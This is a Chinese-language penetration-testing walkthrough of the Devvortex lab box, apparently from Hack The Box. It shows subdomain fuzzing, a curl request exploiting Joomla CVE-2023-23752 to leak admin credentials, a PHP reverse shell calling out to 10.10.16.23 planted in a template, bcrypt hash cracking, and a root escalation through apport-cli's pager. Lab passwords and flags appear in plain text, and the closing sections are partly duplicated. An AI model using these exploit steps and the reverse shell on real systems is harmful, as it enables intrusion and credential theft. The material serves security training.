Devvortex 渗透测试实战教学文档<\/h1>

1. 目标信息收集<\/h2>

1.1 初始扫描<\/h3>

nmap -p- 10.10.11.242 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>将目标IP添加到hosts文件：<\/p>
echo '10.10.11.242 devvortex.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>1.2 子域名爆破<\/h3>
安装必要工具：<\/p>
apt install seclists
<\/span><\/span><\/code><\/pre>使用wfuzz进行子域名爆破：<\/p>
wfuzz -c -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-5000.txt -u "http:\/\/devvortex.htb\/"<\/span> -H "Host: FUZZ.devvortex.htb"<\/span> --hl 7<\/span>
<\/span><\/span><\/code><\/pre>发现子域名后更新hosts：<\/p>
echo '10.10.11.242 dev.devvortex.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>1.3 目录扫描<\/h3>
gobuster dir --url "http:\/\/dev.devvortex.htb\/"<\/span> --wordlist \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt
<\/span><\/span><\/code><\/pre>检查robots.txt：<\/p>
curl http:\/\/dev.devvortex.htb\/robots.txt
<\/span><\/span><\/code><\/pre>2. Web应用分析<\/h2>
2.1 指纹识别<\/h3>
whatweb http:\/\/dev.devvortex.htb\/
<\/span><\/span><\/code><\/pre>2.2 漏洞利用<\/h3>
发现Joomla! CMS，搜索相关漏洞：<\/p>
searchsploit CVE-2023-23752
<\/span><\/span><\/code><\/pre>利用未授权访问漏洞获取配置信息：<\/p>
curl http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=<\/span>true | jq
<\/span><\/span><\/code><\/pre>获取到管理员凭据：<\/p>
username: lewis
password: P4ntherg0t1n5r3c0n##
<\/code><\/pre>
3. 初始访问<\/h2>
3.1 登录后台<\/h3>
访问管理员面板：<\/p>
http:\/\/dev.devvortex.htb\/administrator\/
<\/code><\/pre>
3.2 植入反向Shell<\/h3>
导航至：<\/p>
System -> Templates -> Administrator Templates
<\/code><\/pre>
编辑index.php文件，添加反向shell代码：<\/p>
exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.16.23\/10032 0>&1'"<\/span>);
<\/span><\/span><\/code><\/pre>保存后监听：<\/p>
nc -lvnp 10032<\/span>
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 稳定Shell<\/h3>
方法1：<\/p>
script \/dev\/null -c \/bin\/bash
<\/span><\/span># 按Ctrl+Z<\/span>
<\/span><\/span>stty raw -echo; fg
<\/span><\/span># 按两次Enter<\/span>
<\/span><\/span>export TERM=<\/span>xterm
<\/span><\/span><\/code><\/pre>方法2：<\/p>
SHELL=<\/span>\/bin\/bash script -q \/dev\/null
<\/span><\/span><\/code><\/pre>4.2 数据库信息收集<\/h3>
检查MySQL服务：<\/p>
netstat -ano
<\/span><\/span><\/code><\/pre>连接MySQL：<\/p>
mysql -u lewis -p
<\/span><\/span># 密码: P4ntherg0t1n5r3c0n##<\/span>
<\/span><\/span><\/code><\/pre>查询Joomla数据库：<\/p>
show<\/span> databases;
<\/span><\/span>use joomla;
<\/span><\/span>show<\/span> tables;
<\/span><\/span>select<\/span> username,password from<\/span> sd4fg_users;
<\/span><\/span><\/code><\/pre>4.3 密码破解<\/h3>
保存哈希：<\/p>
echo "\$2y\$10\$IT4k5kmSGvHSO9d6M\/1w0eYiB5Ne9XzArQRFJTGThNiy\/yBtkIj12"<\/span> > hash
<\/span><\/span><\/code><\/pre>使用John破解：<\/p>
john --format=<\/span>bcrypt --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt hash
<\/span><\/span><\/code><\/pre>获取用户logan的密码：<\/p>
username: logan
password: tequieromucho
<\/code><\/pre>
切换用户：<\/p>
su logan
<\/span><\/span><\/code><\/pre>获取用户flag：<\/p>
cat \/home\/logan\/user.txt
<\/span><\/span># a2e439ebea0891abde76fa39322ee67a<\/span>
<\/span><\/span><\/code><\/pre>4.4 提权至root<\/h3>
检查sudo权限：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以执行：<\/p>
\/usr\/bin\/apport-cli
<\/span><\/span><\/code><\/pre>分析apport-cli：<\/p>

该工具使用\/usr\/bin\/sensible-pager<\/code>作为分页器<\/li>
sensible-pager<\/code>支持!<\/code>命令执行<\/li>
<\/ol>
利用方法：<\/p>
sudo \/usr\/bin\/apport-cli -f
<\/span><\/span># 输入任意数字进入菜单<\/span>
<\/span><\/span># 选择V查看报告详情<\/span>
<\/span><\/span># 在分页器中输入: !\/bin\/bash<\/span>
<\/span><\/span><\/code><\/pre>成功获取root权限，读取flag：<\/p>
cat \/root\/root.txt
<\/span><\/span># ebbf314456c1a1428c243b579b031a9f<\/span>
<\/span><\/span><\/code><\/pre>5. 关键知识点总结<\/h2>

子域名爆破<\/strong>：使用wfuzz和seclists字典<\/li>
Joomla漏洞利用<\/strong>：CVE-2023-23752未授权访问API<\/li>
反向Shell植入<\/strong>：通过模板编辑植入PHP反向shell<\/li>
密码破解<\/strong>：使用John破解Joomla的bcrypt哈希<\/li>
特权提升<\/strong>：利用apport-cli的sensible-pager特性通过!<\/code>执行命令<\/li>
<\/ol>
6. 防御建议<\/h2>

限制API访问权限<\/li>
及时更新CMS系统<\/li>
避免使用弱密码<\/li>
限制sudo权限<\/li>
审计使用外部分页器的应用程序<\/li>
<\/ol>

Devvortex 渗透测试实战教学文档<\/h1>

1. 目标信息收集<\/h2>

2. Web应用分析<\/h2>

3. 初始访问<\/h2>

4. 权限提升<\/h2>

6. 防御建议<\/h2> 限制API访问权限<\/li> 及时更新CMS系统<\/li> 避免使用弱密码<\/li> 限制sudo权限<\/li> 审计使用外部分页器的应用程序<\/li> <\/ol>

6. 防御建议<\/h2>

限制API访问权限<\/li>
及时更新CMS系统<\/li>
避免使用弱密码<\/li>
限制sudo权限<\/li>
审计使用外部分页器的应用程序<\/li> <\/ol>